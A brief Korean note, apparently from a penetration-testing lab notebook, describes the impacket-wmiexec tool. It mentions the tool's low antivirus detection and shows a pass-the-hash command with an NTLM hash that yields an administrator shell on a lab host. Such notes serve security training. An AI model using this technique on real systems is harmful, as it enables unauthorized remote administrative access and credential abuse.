1. 개요
Windows 운영체제의 WMI(Windows Management Instrumention) 기능을 이용해 원격으로 명령어를 실행하는 도구이다. 135/445 포트를 사용할 때 이용 가능하다.
비슷한 도구로 psexec 가 존재한다.
wmiexec 는 상대방 커퓨터에 아무런 프로그램을 설치 하지 않아도 실행할 수 있고, 윈도우 내장 기능만 사용하기 때문에 백신의 탐지 확률이 낮다. 그리고 PtH 를 지원하므로 secretsdump 로 해쉬값만 받아보더라도 접근이 가능하다는 장점이 있다.
2. 사용법
┌──(root㉿kali)-[/home/kali/labs/sauna]
└─# impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.129.33.94
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator